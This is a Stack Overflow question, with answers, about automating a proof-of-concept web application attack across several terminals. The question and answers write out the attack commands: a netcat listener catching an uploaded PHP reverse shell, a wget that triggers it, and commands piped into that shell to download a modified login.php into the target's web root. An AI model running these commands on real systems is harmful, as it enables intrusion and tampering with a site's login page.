# How to automate a bash script

Tags: linux, bash, cmd, terminal

Good day good people!

I am trying to write a script that will allow me to show off a PoC for hacking a web application, currently it requires me to open several different processes and terminals and execute commands in a specific terminal then switch back to other ones.

### I want to do the following:

- *terminal 0:*
- start http server     `> python -m SimpleHTTPServer 8081`
- *start terminal 1:*
- start shell listener  `> nc -v -n -l -p 8082`
- *start terminal 2:*
- start reverse shell   `> wget "172.16.0.XXX/upload/16/rs/rs.php"`
- *terminal 1 (inside nc):*
- browse to directory   `> cd var/www/users/`
- download modified page    `> wget "10.13.37.128:8081/login.php"`
- *star terminal 3:*
- Open firefox and browse to 172.16.0.180/users/login.php

> & python -m SimpleHTTPServer 8081
>
> & terminal -e  nc -v -n -l -p 8082
>
> wget "172.16.0.180/upload/16/rs/php-reverse-shell.php"
>
> cd var/www/users   #Problem is here, how do i switch back to the nc terminal?
>
> wget "10.13.37.128:8081/login.php"

What confuses me is switching between the specific terminals when i need to. Would it make sense to just write a macro for this instead or is is possible to do this? Any help would be appreciated!

Comment: Please, try to improve your question by adding some code. Take a look at: https://stackoverflow.com/help/how-to-ask

Comment: @mcNets thank you, sorry i am new to Stack Overflow, any input would be appreciated.

Comment: What about reading at least the [two-minutes tour](http://stackoverflow.com/tour) which is shown when registering to this site, rather than skipping it?

Answer (score 1, accepted):

what about a script that launch various terminal?

```
gnome-terminal -e 'python -m SimpleHTTPServer 8081'
gnome-terminal -e 'nc -v -n -l -p 8082'
gnome-terminal -e 'wget "172.16.0.XXX/upload/16/rs/rs.php"'
gnome-terminal -e 'wget "10.13.37.128:8081/login.php"'
gnome-terminal -e 'firefox "http://172.16.0.180/users/login.php"'
```

for "nc problem" i suggest a simple trick:

```
(sleep 3 ; echo cd var/www/users/ ; echo wget "10.13.37.128:8081/login.php") | nc -v -n -l -p 8082
```

Comment: The problem is that i want to go back to the terminal where i started the listener 'nc -v -n -l -p 8082' after i have run the `wget` request for `rs.php`

Answer (score 0):

```
#!/bin/bash
xterm -title "=http server" -e "python -m SimpleHTTPServer 8081" &
xterm -title "=Shell Listener" -e "nc -v -n -l -p 8082" &
xterm -title "=reverse shell" -e "wget '172.16.0.XXX/upload/16/rs/rs.php'" &
xterm -title "=Download Modified Page" -e "wget '10.13.37.128:8081/login.php'" &
xterm -title "=Firefox" -e "firefox 'http://172.16.0.180/users/login.php'" &
```

This uses Xterm to open multiple terminal emulators for different commands.

Comment: thank you but the problem is that i want to go back to the terminal where i started the listener 'nc -v -n -l -p 8082' after i have run the wget request for rs.php